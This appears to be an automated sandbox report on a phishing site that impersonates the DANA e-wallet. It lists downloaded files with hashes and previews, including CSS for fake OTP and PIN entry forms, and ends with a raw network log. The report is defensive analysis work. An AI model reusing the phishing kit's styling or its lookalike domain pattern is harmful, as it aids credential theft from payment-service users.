                                                  Preview:.PNG........IHDR..............Qf.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME...............IDATx...{....ZzQ...Z; .C.m.x.m.../.x..?;6Nf..N....v...m..$..!.[.VWW..u.....kU.....R.{..t...U.O...>4.0...'..8.(R....%......I..$.q...]$H.B...E..I.M6...l.M..P..$..!.0S...L3F?I,..D....|U.U.;.p.@.',.G,.B.....A.(TX.g..y..Ls...0pI1....^..x8..b.e......p;...!.BE.)^.....I..N..{..p.|b....s.0.*.N2..m..*.p...".$101(aV...00..`.b...fL.[...<\\ .0.^`.9.2...4...Y..L....@.8.&...1E..pq.%...l.e..r..E....).H..&I..66...>...e.;....2L$.*d..:W...B.-.a.[......s..e."%.*....$F....c.12....?..<.6.g.......8..).Hp..\..P*.q,\.,.#...?3.Fp.[...... .0cd.....!...:.....X,l...4Y.W....`...M...3..kn.j...x.M>5.`.c......6s..|9.i.......5>.E..[.'.<3|..|.Z...EM7#<...X.....X.G....P.Q<.u>.<)../b..y...........f..L.....a...._m.C*..+|.y.... ....?.-.!.E.-i.y.QR.G*uK.G.e..:.-Y...J........1........jf...>N0I.*......./.W.6..U=.\...S..[|...-.!.R...c......-.y.G....e.b..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):315
                                                  Entropy (8bit):5.0572271090563765
                                                  Encrypted:false
                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/favicon.ico
                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1255), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):1255
                                                  Entropy (8bit):4.953647349819368
                                                  Encrypted:false
                                                  SSDEEP:24:vASu2KFI8AW2bnDGZMiDgKRKaWE3Vc11AebnVts+ZMeS8ddnsdevRbr:vAzFREjDUs+dtcYctNZS8PsEX
                                                  MD5:7420333C4F6EF8B075A0F757B2AF4F20
                                                  SHA1:0E6836EF790BAABF62AA0DF5F33C8B3E8450295A
                                                  SHA-256:55C79193A97D40E41D31C65BE9722E008C40EE3B3404D7C59DD75114B5986202
                                                  SHA-512:130F33E209E57931EC831A251E2CA9A0A86A52B80477B3C1429084EE06D6D4D8DC9F3B68FFF7FEB96F5095B606DE6A8C0EF642BE60B5A87F3B0952E51B1FE28E
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/6990a7033bbaeadc2040ac863ff124fd.css
                                                  Preview:.bgotp {position: absolute;z-index: 9999;top: 0;left: 0;right: 0;width: 100%;height: 100%;background: #00000032;}.bgotp form {width: 100%;position: absolute;bottom: 0;height: 50%;min-height: 50%;max-height: 50%;background: #fff;border-top-left-radius: 15px;border-top-right-radius: 15px;padding: 40px;}.bgotp #formOtp h2 {font-size: 20px;font-weight: 700;margin-bottom: 10px;}.bgotp #formOtp p {font-size: 14px;font-weight: 500;}.bgotp #formOtp h2,.bgotp #formOtp p {color: #000;text-align: center;}.bgotp #formOtp .resend {margin-top: 35px;font-size: 15px;color: #b1b1b1;}.bgotp #formOtp .resend #countdown {font-size: 15px;color: #b1b1b1;}.box-input-otp {width: 100%;height: 45px;margin-top: 35px;display: flex;justify-content: center;align-items: center;}.box-input-otp input {height: 45px;width: 45px;border: none;outline: none;border-radius: 8px;margin: 0 3px;display: flex;background: #f6f6f6;justify-content: center;align-items: center;text-align: center;font-size: 20px;font-weight: 600;color
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65451)
                                                  Category:dropped
                                                  Size (bytes):89476
                                                  Entropy (8bit):5.2896589255084425
                                                  Encrypted:false
                                                  SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                  MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                  SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                  SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                  SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                  Category:downloaded
                                                  Size (bytes):48236
                                                  Entropy (8bit):7.994912604882335
                                                  Encrypted:true
                                                  SSDEEP:768:uj6JxavgLx5rjTH3CdZ3y11o4uMb2IVEhiB6z6GAAHJApICtBgso6HaOjTXHRWK:ujoa4LxZPCdm3B2IVEhiB62apApISxos
                                                  MD5:015C126A3520C9A8F6A27979D0266E96
                                                  SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                  SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                  SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                  Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 360 x 200, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):16542
                                                  Entropy (8bit):7.94673343485081
                                                  Encrypted:false
                                                  SSDEEP:384:rD/OMxpVl1O5h+X4cTIceArJp3/JhcrScEYkQq2Peex:rDjxpn1O5h+IcVeAp3fcrxvPdx
                                                  MD5:6E77DF79B301B9FB95FDF50D66E3CEB7
                                                  SHA1:1C93476FCCF582D5EA0FA88EC8B1BECC00D9EDB5
                                                  SHA-256:4262DC8D42209D7E2A597F7F1098880E75AD0F6A53A66DA1A7BD094A5F778199
                                                  SHA-512:995F53840326CC7C3F42E9DCD2CCDFDD8278FB100158D94B4B36D7799499E5FE03F34D7880713043ED5536EA240866DB338A2EC3FE9B6BF9FCDDFF1330EB1CC1
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/img/bi.png
                                                  Preview:.PNG........IHDR...h..........{.....sRGB.........sBIT....|.d... .IDATx..y.$U........t.6.6;.......'...8*.(.632"n.:*.......b...~......t....KUVe..............<..R.7N.q..s.9...@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ...........@V$..].O;....x.....H~.@..kf..+y ..AA......t........v.f..n...7.HR..W..(R....@......G__................G.f....#..I_w.-.Tt..9.VS.n.9w......N...5kf$..@`L..00fH....^.<.8..UR.`6:.S......>..o.-[v.>...7*........U$........*.....1./..3..p-.1Q.....t`T.4.x>p..W...l.... /..........1.+0...oG`B#)....\.x...&.s.E.....137.".&3..E..s$..[.....1&.x.>*.7....l.....L..&0.......b...s=.l.n..1....<.I.d}q..L.....}.[.Y...........7.l.....$....6.:.....Q.$..H......U.X......M.X.{...^..d.cj....l@.....*....*.v..Q@~.......|.X.2.....".M..$.*...~..4O....>.zZx...s7Iz...:........I.B.U.......F.~.V...$....VI..yO..A..t.)......;...Z..3f.*i...l..Yo.. .J>.....02....7p.sn?I_4..#p..$%......7..J|\.HP.6K*..V`#..>......BRw..'.r....'.vI]fv(#....6.....S#x.@
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65451)
                                                  Category:downloaded
                                                  Size (bytes):89476
                                                  Entropy (8bit):5.2896589255084425
                                                  Encrypted:false
                                                  SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                  MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                  SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                  SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                  SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://code.jquery.com/jquery-3.5.1.min.js
                                                  Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (666), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):666
                                                  Entropy (8bit):4.8232470526080675
                                                  Encrypted:false
                                                  SSDEEP:12:rf6bR+03vJdVlubBtKO+gvSovJdVtsX21ZmuEq6bK6JEtIF+5cdRXv0bZFXA:g/3VCBVAe3Vts4KdxHddRYFw
                                                  MD5:F04C34E455649C317CBFE449A7C5B10E
                                                  SHA1:07C192CD6C0D6B6A96DDD3FE56FFC5762C2F6EB7
                                                  SHA-256:963EE000EA25A124A63E7DD4DED8A9ADC4D3501DE7D0BF47F78F6FA4BC4EE472
                                                  SHA-512:D0948E109DAB5A9AB5A6E3D02C1896A0EA64FE683EC5036EA148E3E649D1B86794234551B33C8CE573035F77CFDC5209DA966EC087D835A794454F285D1811E6
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/00b9d2e9f52e505c013c16bb638a42a4.css
                                                  Preview:.box-input-pin {width: 100%;height: 45px;margin-top: 50px;display: flex;justify-content: center;align-items: center;}.box-input-pin input {height: 100%;width: 40px;border: none;outline: none;border-radius: 8px;margin: 0 3px;display: flex;justify-content: center;align-items: center;text-align: center;font-size: 18px;font-weight: 700;color: #000;}.box-input-pin .clear {position: absolute;width: 100%;height: 100%;z-index: 99;}.show {margin-top: 30px;width: 105px;height: 25px;outline: none;border: 1px solid #fff;background: none;border-radius: 40px;font-size: 12px;text-align: center;}.forgot {margin-top: 50px;font-size: 15px;font-weight: 600;text-align: center;}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):16
                                                  Entropy (8bit):3.875
                                                  Encrypted:false
                                                  SSDEEP:3:H4ytlR:YytlR
                                                  MD5:A5589C31BAA85B5D31256A68FEEF54A0
                                                  SHA1:1465F23C35C6962D6785D0D013DE3877A1909625
                                                  SHA-256:A91BAEFBE30E4D1B0FCA1204C7EB2C00BBDAD3CDA5CC995F204A1C5BEEFF6442
                                                  SHA-512:3E990C47188E9BED3EB30BED067F379E95A10ECC0FD14B3E918517AC38753714480531C59243DFB10524D4A062D93FBFCAC8AB9B968BAAD006668C37B382C866
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnAJT1Uj07bNhIFDZNbwk0=?alt=proto
                                                  Preview:CgkKBw2TW8JNGgA=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3850), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):3850
                                                  Entropy (8bit):5.004081009176051
                                                  Encrypted:false
                                                  SSDEEP:96:XG4v4Vokbj8GS5cEkHRZuxCGHn1ziA7xMq4:OokEwyctx
                                                  MD5:6A47026EAE042CC9152E2BA28CAE1688
                                                  SHA1:11F91794DDADCD088A8E78720ABD5CCE59700198
                                                  SHA-256:A2A6E6317012A338C0DC67124F68F969166EDC9F7C3F75D54FF48942D785E709
                                                  SHA-512:33E4175C24DED23B9AE9290AA70710F88B92C2233528B33CF925C424D8823C92237CAAEABF8CD0A263A521AE5DF197AE92DF14033B7B4281C1A7CA73CC435661
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/8d62ea654fcf0e4cae001e344ee2592c.css
                                                  Preview:@import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&display=swap');* {font-family: 'Open Sans', sans-serif;font-weight: 400;margin: 0;padding: 0;box-sizing: border-box;position: relative;color: #fff;}b { font-weight: 700; }html { width: 100vw; height: 100vh; }body {background: #118EEA;width: 100vw;height: 100vh;}.box-login, .container {background: #118EEA;height: 100%;width: 100%;}body .header {width: 100%;margin-top: 10px;padding: 10px;height: 50px;display: flex;justify-content: center;align-items: center;}body .header .back {height: 35%;max-height: 35%;min-height: 35%;position: absolute;left: 20px;}body .header .logo {height: 100%;max-height: 100%;min-height: 100%;}form {width: 100%;height: 100%;display: flex;padding: 50px 20px;align-items: center;flex-direction: column;}form h3 {width: 100%;font-size: 14px;text-align: center;}form .box-input {width: 100%;height: 42px;padding: 5px 15px;margin-top: 50px;background: #fff;display: flex;border-radius: 10px;al
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 80 x 45, 8-bit colormap, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):741
                                                  Entropy (8bit):6.2179187268012095
                                                  Encrypted:false
                                                  SSDEEP:12:6v/7FXUCU55555555555555555555555M1uivQS8H9h+6eIbkekqhLzSUFEMb+zM:TCU55555555555555555555555Gv9zIj
                                                  MD5:C15C95B8DB17F44E5826BB7839278578
                                                  SHA1:5BE0AB5ABA6201A0A3A3423F9DB8008ED2385430
                                                  SHA-256:AF52BFB0AB7606D185DB1457DDC3EDCEB61C7FE9675E099CAE3E3BE1ECCF152C
                                                  SHA-512:965183A95CD3356BBEF2BA468A44EFD36E503967F19E797505DB4560846F52C386E8B8221BBC11DA9DE96A02A799B4074222AF7022BC54FAC55F32989C5385B4
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/img/indo.png
                                                  Preview:.PNG........IHDR...P...-......s......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.............................................................................................................................................................................................. .............+..}...=tRNS.......]....Z.)....&...."........".....&......U.....R....|....bKGDCg..b....tIME.....*.........IDATH......P...+|$z.N...5....(c..c..;.8@,.J.V&2....x.X.5.].8.8.....7.h.y...,.....J(..;..dx..E.7...J(.=...`..Fcx.)...P.....[.o...R....."...M...d..".....%tEXtdate:create.2022-10-29T04:40:52+00:00...t...%tEXtdate:modify.2022-10-29T04:40:52+00:00.......(tEXtdate:timestamp.2022-10-29T04:42:19+00:00E..*....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 300 x 300, 8-bit gray+alpha, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):7863
                                                  Entropy (8bit):7.944853026641418
                                                  Encrypted:false
                                                  SSDEEP:192:Oxyj5jciyprh/k6wSpBFcrApNmH58Byn7w3tdZvdsqVhwN5RxADRPtkch:OxsjQpSIFaAqH58Byn7wZvdZVc5R4vFh
                                                  MD5:BF1D4A90DE7E29B2BE55237982CB30B4
                                                  SHA1:EF942049631B598767FDA52D54458B9F9680EE87
                                                  SHA-256:46518758F002D85CFF9220609163F23B7E9F8F2721561D1E0BA79C4F17425C58
                                                  SHA-512:3AC1AB4324711A94DDD9F5BC24D5E2CB3948073602AD5E52F0B2C7B61C1DF072ACA6FB9E015DA9E113071A353F7B7E1493EB7F2C9CDBBB6417938FAB17909B09
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR...,...,......tF.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME..........c....IDATx...odGv..son.L..-.o.HU%..T.[Rkma...[......<..4.`..../.4....0.c...n`..I-...V..ZT{...o.%....".d.......(V....'N...4.................,,,2(2X$I.'N..P(.+......A.....i#......L..@.~....X(2.H?..`.9bX.Yg.....I-.. .I=.4..>....m{.Y!.s+'..I.Y&.*C.. cw..M-..C.v.i.....x...rwaB.[M.'.:c,...k..n.jq..%.h..N:..@..........S,...q.......v..C0....v...M..e..b..n..U..!..M+..P..q..-@.M..a..b..~./a...9C;Mx..twG/-@.%f..,K...*.~L..0H.-...Q.a..X`...X;.#.. . ..`.z...R.B..#.1...).:n.K..........E..s<.!s$..Ni.q'..r.>B...S.!...q.aV...Q+.>.V............d.[.c.}.t..|tr..4!.k.# (...&S....$.:.9..A..?U(.l0.mF..0.....8.s..)I.DH0.5....w....r....|.JV\W.v....,?'.H.>j....IF......sXA..I?/0X.._>.$.|.#.F.*,..K<MH.*..:w..)g..3...y.....B.%np.E......g.D;..U....|.wN.%,..W9.W......|...Z...;...o.awA\.A..xYtNt.).29..\..IW..P..MV....V.?.u...1....A.,.iwQ. ,..x....q.....t...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 80 x 45, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):741
                                                  Entropy (8bit):6.2179187268012095
                                                  Encrypted:false
                                                  SSDEEP:12:6v/7FXUCU55555555555555555555555M1uivQS8H9h+6eIbkekqhLzSUFEMb+zM:TCU55555555555555555555555Gv9zIj
                                                  MD5:C15C95B8DB17F44E5826BB7839278578
                                                  SHA1:5BE0AB5ABA6201A0A3A3423F9DB8008ED2385430
                                                  SHA-256:AF52BFB0AB7606D185DB1457DDC3EDCEB61C7FE9675E099CAE3E3BE1ECCF152C
                                                  SHA-512:965183A95CD3356BBEF2BA468A44EFD36E503967F19E797505DB4560846F52C386E8B8221BBC11DA9DE96A02A799B4074222AF7022BC54FAC55F32989C5385B4
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR...P...-......s......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.............................................................................................................................................................................................. .............+..}...=tRNS.......]....Z.)....&...."........".....&......U.....R....|....bKGDCg..b....tIME.....*.........IDATH......P...+|$z.N...5....(c..c..;.8@,.J.V&2....x.X.5.].8.8.....7.h.y...,.....J(..;..dx..E.7...J(.=...`..Fcx.)...P.....[.o...R....."...M...d..".....%tEXtdate:create.2022-10-29T04:40:52+00:00...t...%tEXtdate:modify.2022-10-29T04:40:52+00:00.......(tEXtdate:timestamp.2022-10-29T04:42:19+00:00E..*....IEND.B`.
                                                  No static file info
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 13, 2024 19:33:21.135974884 CEST49675443192.168.2.4173.222.162.32
                                                  Oct 13, 2024 19:33:24.220875978 CEST49735443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.220987082 CEST44349735172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.221237898 CEST49736443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.221297979 CEST44349736172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.221319914 CEST49735443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.221488953 CEST49736443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.221554995 CEST49735443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.221607924 CEST44349735172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.221848965 CEST49736443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.221865892 CEST44349736172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.695301056 CEST44349736172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.695775986 CEST49736443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.695838928 CEST44349736172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.697483063 CEST44349736172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.697597027 CEST49736443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.698760986 CEST49736443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.698833942 CEST49736443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.698847055 CEST44349736172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.698952913 CEST49736443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.699003935 CEST49736443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.699270964 CEST49737443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.699328899 CEST44349737172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.699476004 CEST49737443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.699836016 CEST49737443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.699856043 CEST44349737172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.712783098 CEST44349735172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.713165045 CEST49735443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.713229895 CEST44349735172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.714145899 CEST44349735172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.714221001 CEST49735443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.717593908 CEST49735443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.717627048 CEST49735443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.717648983 CEST49735443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.717669010 CEST44349735172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.717725039 CEST49735443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.717938900 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.717952013 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:24.718013048 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.718692064 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:24.718707085 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.189939022 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.190294981 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.190377951 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.191426992 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.191503048 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.192480087 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.192545891 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.192723036 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.192740917 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.196245909 CEST44349737172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.196435928 CEST49737443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.196451902 CEST44349737172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.198137045 CEST44349737172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.198208094 CEST49737443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.199246883 CEST49737443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.199363947 CEST44349737172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.246229887 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.246365070 CEST49737443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.246381998 CEST44349737172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.294245005 CEST49737443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.550028086 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.586116076 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.586148977 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.586175919 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.586183071 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.586199999 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.586260080 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.586297989 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.586321115 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.586323023 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.586333036 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.586400986 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.586416006 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.586513996 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.586579084 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.587022066 CEST49738443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:25.587053061 CEST44349738172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:25.599884033 CEST49741443192.168.2.4172.67.207.178
